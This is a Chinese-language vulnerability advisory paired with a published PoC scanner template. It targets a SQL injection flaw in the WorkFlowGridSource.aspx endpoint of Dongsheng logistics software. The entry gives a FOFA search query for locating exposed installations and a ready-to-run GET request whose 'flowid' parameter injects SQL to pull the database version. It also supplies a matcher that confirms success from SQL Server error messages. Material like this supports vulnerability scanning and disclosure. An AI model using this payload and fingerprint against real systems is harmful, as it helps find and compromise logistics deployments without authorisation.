漏洞描述
东胜物流软件是青岛东胜伟业软件有限公司一款集订单管理、仓库管理、运输管理等多种功能于一体的物流管理软件。 东胜物流软件WorkFlowGridSource.aspx接口存在SQL注⼊漏洞
fofa:body="FeeCodes/CompanysAdapter.aspx" || body="dhtmlxcombo_whp.js" || body="dongshengsoft" || body="theme/dhtmlxcombo.css"
dongshengwuliu-workflowgridsource-sqli: 东胜物流软件WorkFlowGridSource.aspx接口存在SQL注入漏洞
PoC代码[已公开]
id: dongshengwuliu-workflowgridsource-sqli
info:
name: 东胜物流软件WorkFlowGridSource.aspx接口存在SQL注入漏洞
author: avic123
severity: high
verified: true
description: |
东胜物流软件是青岛东胜伟业软件有限公司一款集订单管理、仓库管理、运输管理等多种功能于一体的物流管理软件。 东胜物流软件WorkFlowGridSource.aspx接口存在SQL注⼊漏洞
fofa:body="FeeCodes/CompanysAdapter.aspx" || body="dhtmlxcombo_whp.js" || body="dongshengsoft" || body="theme/dhtmlxcombo.css"
reference:
- https://mp.weixin.qq.com/s/PH8YpZZt0VhQQUOGgIkmyA
tags: dongshengwuliu,sqli
created: 2025/08/22
rules:
r0:
request:
method: GET
path: /WorkFlow/WorkFlowGridSource.aspx?handle=steplist&flowid='-1/@@version--
expression: response.status == 500 && response.body.bcontains(b"Microsoft SQL Server") && response.body.bcontains(b"SqlException:")
expression: r0()